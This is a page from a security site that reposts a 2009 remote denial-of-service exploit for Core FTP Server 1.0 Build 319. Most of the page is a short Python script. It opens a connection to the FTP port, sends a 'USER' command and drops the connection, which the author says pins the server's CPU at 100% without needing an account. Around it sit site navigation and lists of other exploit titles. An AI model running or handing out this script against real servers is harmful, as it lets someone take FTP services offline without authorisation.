首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Core FTP Server version 1.0 Build 319 suffers from a remote denial of service vu
来源:mert.sarica[at]gmail.com 作者:SARICA 发布时间:2009-12-07  
view source
print?
# Note: FTP account is not required for exploitation
# http://www.mertsarica.com
# I discovered a denial-of-service vulnerability on Core FTP Server product.
# When you send "USER test\r\n" and then kills the connection
# immediately, cpu increases to 100% and stays at that level until you
# stop the ftp service.
 
 
import socket, sys
 
HOST = 'localhost'   
PORT = 21            
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
    s.connect((HOST, PORT))
except:
    print "Connection error"
    sys.exit(1)
 
try:
    s.send('USER MS\r\n') # magic packet
    s.close()
    print("Very good, young padawan, but you still have much to learn...")
except:
    print "Connection error"
    sys.exit(1)

 

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·The libmodplug library is pron
·M3U To ASX-WPL 1.1 (m3u Playli
·Jasc Paint Shop pro version 8
·HTML Help Workshop 4.74 (hhp P
·Vivid Ads Shopping Cart suffer
·Audacity 1.2.6 (gro File) Buff
·PHP suffers from an ini_restor
·HTML Help Workshop 4.74 (hhp)
·SYMANTEC AV w/ INTEL FILE TRAN
·IDEAL Administration 2009 Buff
·PHP 'ini_restore()' Memory Inf
·VLC Media Player <= 1.0.3 RTSP
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved